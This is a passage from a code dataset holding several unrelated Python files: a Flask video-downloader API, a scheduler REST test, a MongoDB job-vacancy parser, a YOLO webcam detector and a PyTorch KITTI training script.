results\n data, has_error = try_action(lambda: vm.process_video(data, is_new=True))\n if has_error: return json.dumps({\"message\":data}), has_error, {'ContentType':'application/json'}\n logging.info(f\"Link '{link}' has been successfully processed: {json.dumps(data)}\")\n\n # Commit results\n data, has_error = try_action(lambda: vm.create_video(data))\n if has_error: return json.dumps({\"message\": \"Could not process request\", \"data\": data}, indent=4), has_error, {'ContentType':'application/json'}\n logging.info(f\"Link '{link}' has been successfully committed: {json.dumps(data)}\")\n return json.dumps(data, indent=4), 201, {'ContentType':'application/json'}\n\n\n\n@app.route('/videos/queries', methods=['POST'])\ndef get_videos_advanced(): \n http = urllib3.PoolManager()\n encoded_data = json.dumps(request.json).encode('utf-8')\n logging.debug('Running elasticsearch query: '+ encoded_data.decode('utf-8'))\n \n data, has_error = try_action(lambda: http.request(\n 'POST', \n vm.get_search_url(prettify=True),\n body = encoded_data,\n headers = {'Content-Type': 'application/json'}\n ))\n if has_error: return json.dumps({\"message\": \"Could not process request\", \"data\": data}, indent=4), has_error, {'ContentType':'application/json'}\n return json.dumps(vm.to_VideoRecord(json.loads(data.data.decode('utf-8'))), indent=4), 200, {'ContentType':'application/json'}\n\n@app.route('/videos')\n@app.route('/videos/')\ndef get_videos(): \n logging.debug(\"Retrieving videos\")\n query = urllib.parse.unquote(request.query_string.decode('utf-8')).replace(\"=\", \":\").replace(\"&\", \" AND \")\n encoded_args = urllib.parse.urlencode({'q': query if query is not \"\" else \"*=*\"})\n http = urllib3.PoolManager()\n logging.debug(f\"Retrieving videos with: {json.dumps({'q': query})}\")\n \n # data, has_error = try_action(lambda: http.request('GET', f'http://youtube_downloader_elasticsearch_app_1:9200/videos/_search?{encoded_args}'))\n data, has_error = try_action(lambda: http.request('GET', vm.get_search_url(args=encoded_args)))\n if has_error: return json.dumps({\"message\": \"Could not process request\", \"data\": data}, indent=4), has_error, {'ContentType':'application/json'}\n return json.dumps(vm.to_VideoRecord(json.loads(data.data.decode('utf-8'))), indent=4), 200, {'ContentType':'application/json'}\n\n@app.route('/ping')\ndef ping(): return json.dumps({\"code\":200, \"reply\": \"pong\", \"host\": \"backend\"}, indent=4), 200, {'ContentType':'application/json'}\n\n\n@app.route(\"/zip\", methods=['POST'])\ndef archive(): \n logging.debug(\"Zipping videos\")\n\n manifest = [ vm.get_name_from_id(id) for id in request.json ]\n logging.debug(f\"Zip Manifest: {json.dumps(manifest)}\")\n\n\n bundle_name, bundle_path, bundle_url = vm.get_zipfile_details(url_root=request.url_root)\n _data, has_error = try_action(lambda: zip.from_iterator(bundle_path, [ (vm.get_name_from_id(id), vm.get_path_from_id(id)) for id in request.json ] + [(\"manifest.json\", {\"manifest\": manifest})]))\n if has_error: return json.dumps({\"message\": \"Could not bundles videos\", \"data\": _data}, indent=4), has_error, {'ContentType':'application/json'}\n logging.debug(f\"Bundle accessible at: {bundle_url}\")\n return json.dumps({\"link\": bundle_url}, indent=4), 200, {'ContentType':'application/json'}\n\n\n@app.route('/')\n@app.route(\"/\", defaults={\"path\": \"\"})\n@app.route(\"/\") \n@app.route(\"/\")\ndef home(): return json.dumps({\"approutes\": rff.get_routes(__file__)}, indent=4), 200, {'ContentType':'application/json'}\n\n# https://code-maven.com/python-flask-catch-exception\n@app.errorhandler(Exception)\ndef server_error(err):\n app.logger.exception(err)\n return json.dumps({\"code\":500, \"message\": \"Unexpected Error Occured\"}, indent=4), 200, {'ContentType':'application/json'}", "sub_path": "youtube_downloader/api/app/api.py", "file_name": "api.py", "file_ext": "py", "file_size_in_byte": 7844, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "__init__.setup_logging", "line_number": 16, "usage_type": "call"}, {"api_name": "flask.Flask", "line_number": 17, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 23, "usage_type": "call"}, {"api_name": "utils.video_manager.get_video_by_url", "line_number": 36, "usage_type": "call"}, {"api_name": "utils.video_manager", "line_number": 36, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 37, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 38, "usage_type": "call"}, {"api_name": "utils.video_manager.to_VideoRecord", "line_number": 38, "usage_type": "call"}, {"api_name": "utils.video_manager", "line_number": 38, "usage_type": "name"}, {"api_name": "utils.video_manager.get_video_by_id", "line_number": 42, "usage_type": "call"}, {"api_name": "utils.video_manager", "line_number": 42, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 43, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 44, "usage_type": "call"}, {"api_name": "utils.video_manager.to_VideoRecord", "line_number": 44, "usage_type": "call"}, {"api_name": "utils.video_manager", "line_number": 44, "usage_type": "name"}, {"api_name": "utils.video_manager.video_from_user_data", "line_number": 50, "usage_type": "call"}, {"api_name": "utils.video_manager", "line_number": 50, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 50, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 50, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 51, "usage_type": "call"}, {"api_name": "utils.video_manager.get_video_by_id", "line_number": 54, "usage_type": "call"}, {"api_name": "utils.video_manager", "line_number": 54, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 55, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 56, "usage_type": "call"}, {"api_name": "utils.video_manager.process_video", "line_number": 59, "usage_type": "call"}, {"api_name": "utils.video_manager", "line_number": 59, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 60, "usage_type": "call"}, {"api_name": "utils.video_manager.update_video", "line_number": 63, "usage_type": "call"}, {"api_name": "utils.video_manager", "line_number": 63, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 64, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 65, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 70, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 70, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 74, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 74, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 79, "usage_type": "call"}, {"api_name": "utils.video_manager.video_from_user_data", "line_number": 84, "usage_type": "call"}, {"api_name": "utils.video_manager", "line_number": 84, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 85, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 86, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 86, "usage_type": "call"}, {"api_name": "utils.video_manager.get_video_by_url", "line_number": 90, "usage_type": "call"}, {"api_name": "utils.video_manager", "line_number": 90, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 91, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 92, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 93, "usage_type": "call"}, {"api_name": "utils.video_manager.process_video", "line_number": 96, "usage_type": "call"}, {"api_name": "utils.video_manager", "line_number": 96, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 97, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 98, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 98, "usage_type": "call"}, {"api_name": "utils.video_manager.create_video", "line_number": 101, "usage_type": "call"}, {"api_name": "utils.video_manager", "line_number": 101, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 102, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 103, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 103, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 104, "usage_type": "call"}, {"api_name": "urllib3.PoolManager", "line_number": 110, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 111, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 111, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 111, "usage_type": "name"}, {"api_name": "logging.debug", "line_number": 112, "usage_type": "call"}, {"api_name": "utils.video_manager.get_search_url", "line_number": 116, "usage_type": "call"}, {"api_name": "utils.video_manager", "line_number": 116, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 120, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 121, "usage_type": "call"}, {"api_name": "utils.video_manager.to_VideoRecord", "line_number": 121, "usage_type": "call"}, {"api_name": "utils.video_manager", "line_number": 121, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 121, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 126, "usage_type": "call"}, {"api_name": "urllib.parse.unquote", "line_number": 127, "usage_type": "call"}, {"api_name": "urllib.parse", "line_number": 127, "usage_type": "attribute"}, {"api_name": "flask.request.query_string.decode", "line_number": 127, "usage_type": "call"}, {"api_name": "flask.request.query_string", "line_number": 127, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 127, "usage_type": "name"}, {"api_name": "urllib.parse.urlencode", "line_number": 128, "usage_type": "call"}, {"api_name": "urllib.parse", "line_number": 128, "usage_type": "attribute"}, {"api_name": "urllib3.PoolManager", "line_number": 129, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 130, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 130, "usage_type": "call"}, {"api_name": "utils.video_manager.get_search_url", "line_number": 133, "usage_type": "call"}, {"api_name": "utils.video_manager", "line_number": 133, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 134, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 135, "usage_type": "call"}, {"api_name": "utils.video_manager.to_VideoRecord", "line_number": 135, "usage_type": "call"}, {"api_name": "utils.video_manager", "line_number": 135, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 135, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 138, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 143, "usage_type": "call"}, {"api_name": "utils.video_manager.get_name_from_id", "line_number": 145, "usage_type": "call"}, {"api_name": "utils.video_manager", "line_number": 145, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 145, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 145, "usage_type": "name"}, {"api_name": "logging.debug", "line_number": 146, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 146, "usage_type": "call"}, {"api_name": "utils.video_manager.get_zipfile_details", "line_number": 149, "usage_type": "call"}, {"api_name": "utils.video_manager", "line_number": 149, "usage_type": "name"}, {"api_name": "flask.request.url_root", "line_number": 149, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 149, "usage_type": "name"}, {"api_name": "utils.zip.from_iterator", "line_number": 150, "usage_type": "call"}, {"api_name": "utils.zip", "line_number": 150, "usage_type": "name"}, {"api_name": "utils.video_manager.get_name_from_id", "line_number": 150, "usage_type": "call"}, {"api_name": "utils.video_manager", "line_number": 150, "usage_type": "name"}, {"api_name": "utils.video_manager.get_path_from_id", "line_number": 150, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 150, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 150, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 151, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 152, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 153, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 160, "usage_type": "call"}, {"api_name": "utils.routes_from_file.get_routes", "line_number": 160, "usage_type": "call"}, {"api_name": "utils.routes_from_file", "line_number": 160, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 166, "usage_type": "call"}]} +{"seq_id": "613681354", "text": "\"\"\"Scheduler reports REST api tests.\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport unittest\n\nimport flask\nimport flask_restplus as restplus\nimport mock\n\nimport pandas as pd\n\nfrom treadmill import webutils\nfrom treadmill.rest import error_handlers\nfrom treadmill.rest.api import scheduler\n\n\nclass ReportTest(unittest.TestCase):\n \"\"\"Test the scheduler reports REST api.\"\"\"\n\n def setUp(self):\n \"\"\"Initialize the app with the corresponding logic.\"\"\"\n self.app = flask.Flask(__name__)\n self.app.testing = True\n\n api = restplus.Api(self.app)\n error_handlers.register(api)\n\n cors = webutils.cors(origin='*',\n content_type='application/json',\n credentials=False)\n self.impl = mock.Mock()\n\n scheduler.init(api, cors, self.impl)\n self.client = self.app.test_client()\n\n def test_get(self):\n \"\"\"Test fetching a report.\"\"\"\n self.impl.get.return_value = pd.DataFrame(\n [[1, 2, 3], [4, 5, 6]],\n columns=[\"a\", \"b\", \"c\"]\n )\n\n resp = self.client.get('/scheduler/servers')\n self.assertEqual(\n ''.join(resp.response),\n '{\"data\": [[1, 2, 3], [4, 5, 6]], \"columns\": [\"a\", \"b\", \"c\"]}'\n )\n\n def test_get_match(self):\n \"\"\"Test fetching report with match.\"\"\"\n self.impl.get.return_value = pd.DataFrame(\n [[\"findme\", 2, 3]],\n columns=[\"name\", \"b\", \"c\"]\n )\n self.client.get('/scheduler/servers?match=findme')\n self.impl.get.assert_called_with('servers', match='findme')\n\n\nif __name__ == '__main__':\n unittest.main()\n", "sub_path": "tests/rest/api/scheduler_test.py", "file_name": "scheduler_test.py", "file_ext": "py", "file_size_in_byte": 1779, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "unittest.TestCase", "line_number": 20, "usage_type": "attribute"}, {"api_name": "flask.Flask", "line_number": 25, "usage_type": "call"}, {"api_name": "flask_restplus.Api", "line_number": 28, "usage_type": "call"}, {"api_name": "treadmill.rest.error_handlers.register", "line_number": 29, "usage_type": "call"}, {"api_name": "treadmill.rest.error_handlers", "line_number": 29, "usage_type": "name"}, {"api_name": "treadmill.webutils.cors", "line_number": 31, "usage_type": "call"}, {"api_name": "treadmill.webutils", "line_number": 31, "usage_type": "name"}, {"api_name": "mock.Mock", "line_number": 34, "usage_type": "call"}, {"api_name": "treadmill.rest.api.scheduler.init", "line_number": 36, "usage_type": "call"}, {"api_name": "treadmill.rest.api.scheduler", "line_number": 36, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 41, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 54, "usage_type": "call"}, {"api_name": "unittest.main", "line_number": 63, "usage_type": "call"}]} +{"seq_id": "221441772", "text": "import pymongo\nfrom datetime import datetime, timedelta\nimport re\n\narray_vacancies = []\nparsed_vacancy = []\n\n\nclass Data_base:\n def __init__(self, collection_name):\n self.collection_name = collection_name\n\n \"\"\"The connection to the database\"\"\"\n def connect_db(self):\n client = pymongo.MongoClient('192.168.128.231:27017')\n db = client['crawler']\n posts = db[self.collection_name]\n return posts\n\n\nclass Parser_vacancy:\n def __init__(self):\n self.status = 'INATIVE'\n\n \"\"\"this function get vacancies in interval 20 minutes(time create_vacancy + 20 minutes)\"\"\"\n def get_vacancy(self, status):\n array_vacancies.clear()\n data_vacancy = Data_base('vacancy').connect_db()\n # current\n # date_time1 = datetime.today()\n # current - 20\n # date_time2 = timedelta(minutes=20)\n # 'created_date': {'$gte': date_time1 - date_time2, '$lt': date_time1}\n for vacancy in data_vacancy.find({'status': status}):\n self.change_status('vacancy', vacancy)\n array_vacancies.append(vacancy)\n\n # new, in the process, processed\n \"\"\"Change status and modified_date depending on the current\"\"\"\n def change_status(self, name_database, data_vacancy):\n data_base = Data_base(name_database).connect_db()\n if data_vacancy['status'] == 'NEW':\n data_base.update({'_id': data_vacancy['_id']},\n {'$set': {'status': 'IN_PROCESS', 'modified_date': datetime.now()}})\n self.status = 'IN_PROCESS'\n elif data_vacancy['status'] == 'IN_PROCESS':\n data_base.update({'_id': data_vacancy['_id']},\n {'$set': {'status': 'PROCESSED', 'modified_date': datetime.now()}})\n self.status = 'PROCESSED'\n else:\n data_base.update({'_id': data_vacancy['_id']},\n {'$set': {'status': 'FAILED', 'modified_date': datetime.today()}})\n self.status = 'FAILED'\n\n \"\"\"Cleaning raw from others symbols, signs, stop_words. And division the words\"\"\"\n def set_parsed_vacancy(self):\n try:\n parsed_vacancy.clear()\n data_base = Data_base('parsed_vacancy').connect_db()\n self.get_vacancy('IN_PROCESS')\n for vacancy in array_vacancies:\n reg = re.compile(\"[^а-яёїієґьщ'a-z0-9 ]+-\")\n words = reg.sub('', vacancy['raw'])\n for junk_char in \"%$@*.!&,:;•/\\—)[]+(»«\":\n words = words.replace(junk_char, ' ')\n skills = self.check_stop_words(words.split())\n parsed_vacancy.append(\n {\n 'vacancy_id': vacancy['_id'],\n 'crawler_id': vacancy['crawler_id'],\n 'link': vacancy['link'],\n 'raw_vacancy': list(set(skills)),\n 'status': 'NEW',\n 'created_date': datetime.today(),\n 'modified_date': datetime.today()\n })\n self.change_status('vacancy', vacancy)\n data_base.insert_many(parsed_vacancy)\n except:\n self.status = 'FAILED'\n\n def check_stop_words(self, words):\n data_stop_word = Data_base('stop_words').connect_db()\n for word in words:\n for stop_word in data_stop_word.find({}):\n if word == stop_word['key']:\n words.remove(word)\n return words\n\n def run(self):\n \"\"\"To collect all vacancies with status NEW\"\"\"\n self.get_vacancy('NEW')\n \"\"\"Main function for document parsed_vacancy\"\"\"\n self.set_parsed_vacancy()\n\n# parser = Parser_vacancy()\n# parser.run()", "sub_path": "parser/parser.py", "file_name": "parser.py", "file_ext": "py", "file_size_in_byte": 3785, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "pymongo.MongoClient", "line_number": 15, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 44, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 44, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 48, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 48, "usage_type": "name"}, {"api_name": "datetime.datetime.today", "line_number": 52, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 52, "usage_type": "name"}, {"api_name": "re.compile", "line_number": 62, "usage_type": "call"}, {"api_name": "datetime.datetime.today", "line_number": 74, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 74, "usage_type": "name"}, {"api_name": "datetime.datetime.today", "line_number": 75, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 75, "usage_type": "name"}]} +{"seq_id": "526474941", "text": "import cv2\nimport numpy as np\nimport time\n#import imutils\n#import serial\n\n#serial initialiaztiom\n#ser = serial.Serial('/dev/ttyACM0', 9600, timeout=1)\n#ser.flush()\n\n# Load Yolo\nnet = cv2.dnn.readNet(\"yolov3-tiny.weights\", \"yolov3-tiny.cfg\")\nclasses = []\nwith open(\"coco.names\", \"r\") as f:\n classes = [line.strip() for line in f.readlines()]\nlayer_names = net.getLayerNames()\noutput_layers = [layer_names[i[0] - 1] for i in net.getUnconnectedOutLayers()]\ncolors = np.random.uniform(0, 255, size=(len(classes), 3))\nfont = cv2.FONT_HERSHEY_PLAIN\nx_ = cv2.CAP_PROP_FRAME_WIDTH\ny_ = cv2.CAP_PROP_FRAME_HEIGHT\n# Loading image\ncap = cv2.VideoCapture(0)\n\ntime_start = time.time()\nframe_id = 0\nwhile True:\n \n # print(cap.get(cv2.CAP_PROP_FRAME_WIDTH))\n # print(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))\n\n _, frame = cap.read()\n# frame = imutils.resize(frame, width=640)\n # frame = cv2.resize(frame, None, fx=2, fy=2)\n frame_id += 1\n height, width, channels = frame.shape\n\n # cv2.line(image, start_point, end_point, color, thickness)\n cv2.line(frame, (int(width/2), 0), (int(width/2), width), (0, 255, 0), 1)\n cv2.line(frame, (0, int(height / 2)), (width, int(height / 2)), (0, 255, 0), 1)\n # Detecting objects\n blob = cv2.dnn.blobFromImage(frame, 0.00392, (224, 224), (0, 0, 0), True, crop=False)\n\n net.setInput(blob)\n outs = net.forward(output_layers)\n\n # HUD\n class_ids = []\n confidences = []\n boxes = []\n for out in outs:\n for detection in out:\n scores = detection[5:]\n class_id = np.argmax(scores)\n confidence = scores[class_id]\n if confidence > 0.0001:\n # Object detected\n\n # if confiede\n\n center_x = int(detection[0] * width)\n center_y = int(detection[1] * height)\n w = int(detection[2] * width)\n h = int(detection[3] * height)\n\n # Rectangle coordinates\n x = int(center_x - w / 2)\n y = int(center_y - h / 2)\n\n boxes.append([x, y, w, h])\n confidences.append(float(confidence))\n class_ids.append(class_id)\n\n indexes = cv2.dnn.NMSBoxes(boxes, confidences, 0.5, 0.4)\n # print(indexes)\n\n for i in range(len(boxes)):\n if i in indexes:\n x, y, w, h = boxes[i]\n label = str(classes[class_ids[i]])\n \n \n # bottle hoile dekhabe\n if label.lower() == \"bottle\" or label.lower()==\"orange\" or label.lower() == \"apple\": \n confidence = confidences[i]\n color = colors[class_ids[i]]\n # cv2.rectangle(frame, (x, y), (x + w, y + h), color, 2)\n # cv2.circle(frame,(center_x,center_y),5, color,-1)\n cv2.line(frame, (int(width/2), int(height/2)), (center_x, center_y), color, 2)\n cv2.putText(frame, label + \" \" + str(round(confidence * 100)) + \"%\", (x, y + 30), font, 0.7, color, 1)\n \n horizontal_distance = (center_x - int(width/2))\n vertical_distance = (int(height/2)- center_y)\n text = str(horizontal_distance)+ \",\" +str(vertical_distance)+ \"\\n\"\n textForArd = str.encode(text)\n print(text)\n #ser.write(textForArd)\n elapsed_time = time.time() - time_start\n fps = frame_id / elapsed_time\n cv2.putText(frame, \"FPS:\" + str(round(fps, 2)), (10, 30), font, 1, (0, 0, 255), 1)\n cv2.putText(frame, \"Press 'Q' to close the window\", (100, 30), font, 1, (0, 0, 255), 1)\n #print(\"FPS:\"+ str(round(fps, 2)))\n cv2.imshow(\"Image\", frame)\n key = cv2.waitKey(24)\n if key == ord('q'):\n break\n\ncv2.destroyAllWindows()", "sub_path": "TEST%1.py", "file_name": "TEST%1.py", "file_ext": "py", "file_size_in_byte": 3766, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "cv2.dnn.readNet", "line_number": 12, "usage_type": "call"}, {"api_name": "cv2.dnn", "line_number": 12, "usage_type": "attribute"}, {"api_name": "numpy.random.uniform", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 18, "usage_type": "attribute"}, {"api_name": "cv2.FONT_HERSHEY_PLAIN", "line_number": 19, "usage_type": "attribute"}, {"api_name": "cv2.CAP_PROP_FRAME_WIDTH", "line_number": 20, "usage_type": "attribute"}, {"api_name": "cv2.CAP_PROP_FRAME_HEIGHT", "line_number": 21, "usage_type": "attribute"}, {"api_name": "cv2.VideoCapture", "line_number": 23, "usage_type": "call"}, {"api_name": "time.time", "line_number": 25, "usage_type": "call"}, {"api_name": "cv2.line", "line_number": 39, "usage_type": "call"}, {"api_name": "cv2.line", "line_number": 40, "usage_type": "call"}, {"api_name": "cv2.dnn.blobFromImage", "line_number": 42, "usage_type": "call"}, {"api_name": "cv2.dnn", "line_number": 42, "usage_type": "attribute"}, {"api_name": "numpy.argmax", "line_number": 54, "usage_type": "call"}, {"api_name": "cv2.dnn.NMSBoxes", "line_number": 74, "usage_type": "call"}, {"api_name": "cv2.dnn", "line_number": 74, "usage_type": "attribute"}, {"api_name": "cv2.line", "line_number": 89, "usage_type": "call"}, {"api_name": "cv2.putText", "line_number": 90, "usage_type": "call"}, {"api_name": "time.time", "line_number": 98, "usage_type": "call"}, {"api_name": "cv2.putText", "line_number": 100, "usage_type": "call"}, {"api_name": "cv2.putText", "line_number": 101, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 103, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 104, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 108, "usage_type": "call"}]} +{"seq_id": "509290444", "text": "import torch\r\nfrom torch.utils.data import DataLoader\r\nfrom torch.autograd import Variable\r\nimport torch.optim as optim\r\nfrom torch.utils.tensorboard import SummaryWriter\r\n\r\nimport os\r\nimport argparse\r\n\r\nfrom model import Net\r\nfrom utils.dataset import ReadDataset\r\n\r\n\r\ndef train(train_dataloader, model, mse_loss, optimizer, epoch, writer, config):\r\n model.train()\r\n running_loss = 0.\r\n total_average_loss = 0.\r\n\r\n for batch_i, (_, imgs, targets) in enumerate(train_dataloader):\r\n imgs = Variable(imgs.float()).cuda()\r\n targets = Variable(targets.view((-1, 10)).float(), requires_grad=False).cuda()\r\n\r\n optimizer.zero_grad()\r\n\r\n output = model(imgs)\r\n\r\n loss = mse_loss(output, targets)\r\n\r\n loss.backward()\r\n optimizer.step()\r\n\r\n print('[Epoch %d/%d, Batch %d/%d] [Loss: total %f]'\r\n %\r\n (epoch+1,\r\n config.epochs,\r\n batch_i+1,\r\n len(train_dataloader),\r\n loss.item())\r\n )\r\n\r\n # save the loss every 100 iterations\r\n\r\n running_loss += loss.item()\r\n total_average_loss += loss.item()\r\n\r\n if batch_i % 100 == 99:\r\n global_step = batch_i + epoch * len(train_dataloader) + 1\r\n writer.add_scalar('Train Loss', running_loss / 100, global_step)\r\n writer.flush()\r\n running_loss = 0.\r\n\r\n # save the weights of every epoch\r\n if epoch % config.checkpoint_interval == 0:\r\n total_average_loss /= len(train_dataloader)\r\n torch.save(model.state_dict(),\r\n '%s/epoch_%d_train_%.6f.pth' % (config.checkpoint_dir, epoch + 1, total_average_loss))\r\n\r\n\r\ndef valid(val_dataloader, model, mse_loss, epoch, writer, config):\r\n print('now evaluate on val dataset.................................................')\r\n model.eval()\r\n running_loss = 0.\r\n\r\n with torch.no_grad():\r\n for batch_i, (_, imgs, targets) in enumerate(val_dataloader):\r\n imgs = Variable(imgs).cuda()\r\n targets = Variable(targets.view((-1, 10)), requires_grad=False).cuda()\r\n\r\n output = model(imgs)\r\n\r\n loss = mse_loss(output, targets)\r\n\r\n running_loss += loss.item()\r\n\r\n writer.add_scalar('Val Loss', running_loss / len(val_dataloader), epoch + 1)\r\n writer.flush()\r\n\r\n pth_filenames = os.listdir(config.checkpoint_dir)\r\n for filename in pth_filenames:\r\n if 'epoch_%d' % (epoch + 1) in filename:\r\n pth_oldname = config.checkpoint_dir + '/' + filename\r\n pth_newname = os.path.splitext(pth_oldname)[0] + '_val_%.6f.pth' % (running_loss / len(val_dataloader))\r\n os.rename(pth_oldname, pth_newname)\r\n return running_loss / len(val_dataloader)\r\n\r\n\r\ndef main():\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument('--epochs', type=int, default=80, help='number of epochs')\r\n parser.add_argument('--batch_size', type=int, default=32, help='size of each img batch')\r\n parser.add_argument('--train_path', type=str, default='train.txt', help='train dataset path')\r\n parser.add_argument('--val_path', type=str, default='valid.txt', help='valid dataset path')\r\n parser.add_argument('--checkpoint_interval', type=int, default=1, help='interval between saving model weights')\r\n parser.add_argument('--checkpoint_dir', type=str, default='checkpoints', help='directory for saving model weights')\r\n parser.add_argument('--tensorboard_dir', type=str, default='logs', help='directory for saving logs')\r\n config = parser.parse_args()\r\n print(config)\r\n\r\n torch.set_num_threads(4)\r\n\r\n os.makedirs(config.checkpoint_dir, exist_ok=True)\r\n os.makedirs(config.tensorboard_dir, exist_ok=True)\r\n\r\n writer = SummaryWriter(config.tensorboard_dir)\r\n\r\n model = Net().cuda()\r\n\r\n train_dataloader = DataLoader(ReadDataset(config.train_path),\r\n batch_size=config.batch_size, shuffle=True, num_workers=0, pin_memory=True)\r\n if config.val_path:\r\n val_dataloader = DataLoader(ReadDataset(config.val_path),\r\n batch_size=config.batch_size, shuffle=True, num_workers=0, pin_memory=True)\r\n\r\n optimizer = optim.Adam(model.parameters(), lr=0.001)\r\n scheduler = optim.lr_scheduler.StepLR(optimizer, step_size=1, gamma=0.1)\r\n mse_loss = torch.nn.SmoothL1Loss().cuda()\r\n\r\n min_valloss = 100000\r\n early_stop = 0\r\n for epoch in range(config.epochs):\r\n train(train_dataloader, model, mse_loss, optimizer, epoch, writer, config)\r\n\r\n if config.val_path:\r\n valloss = valid(val_dataloader, model, mse_loss, epoch, writer, config)\r\n if valloss > min_valloss - 1e-4:\r\n early_stop += 1\r\n if early_stop == 5:\r\n scheduler.step()\r\n if early_stop == 10:\r\n print(\"The val loss doesn't decrease for 5 epochs, early stop!\")\r\n break\r\n else:\r\n early_stop = 0\r\n min_valloss = valloss\r\n\r\n\r\n writer.close()\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n", "sub_path": "KITTI_Dataset/train.py", "file_name": "train.py", "file_ext": "py", "file_size_in_byte": 5195, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "model.train", "line_number": 15, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 20, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 21, "usage_type": "call"}, {"api_name": "torch.save", "line_number": 55, "usage_type": "call"}, {"api_name": "model.state_dict", "line_number": 55, "usage_type": "call"}, {"api_name": "model.eval", "line_number": 61, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 64, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 66, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 67, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 78, "usage_type": "call"}, {"api_name": "os.path.splitext", "line_number": 82, "usage_type": "call"}, {"api_name": "os.path", "line_number": 82, "usage_type": "attribute"}, {"api_name": "os.rename", "line_number": 83, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 88, "usage_type": "call"}, {"api_name": "torch.set_num_threads", "line_number": 99, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 101, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 102, "usage_type": "call"}, {"api_name": "torch.utils.tensorboard.SummaryWriter", "line_number": 104, "usage_type": "call"}, {"api_name": "model.Net", "line_number": 106, "usage_type": "call"}, {"api_name": 